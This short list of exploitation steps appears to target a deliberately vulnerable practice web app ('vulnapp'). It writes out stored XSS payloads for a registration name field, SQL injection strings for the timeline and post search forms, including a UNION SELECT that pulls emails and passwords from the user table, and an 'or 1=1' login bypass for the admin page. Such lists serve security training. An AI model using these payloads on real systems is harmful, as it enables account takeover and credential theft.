- register with insert XSS code(' );<script>alert(***)</script> -- ') Name form
- and Login page, login with mail and pass
- Rendering login user name in template, so occur XSS
- register with insert XSS code ( '}}<script>alert(1)</script>{{' ) Name form
- open timeline
- search timeline use
%" or 1=1; --
- open timeline
- search post use
" union select mail,passwd from vulnapp.user ;
- open admin login page
- Input
" or 1=1; --
into Mail-address form - Input random word into password form
- Enter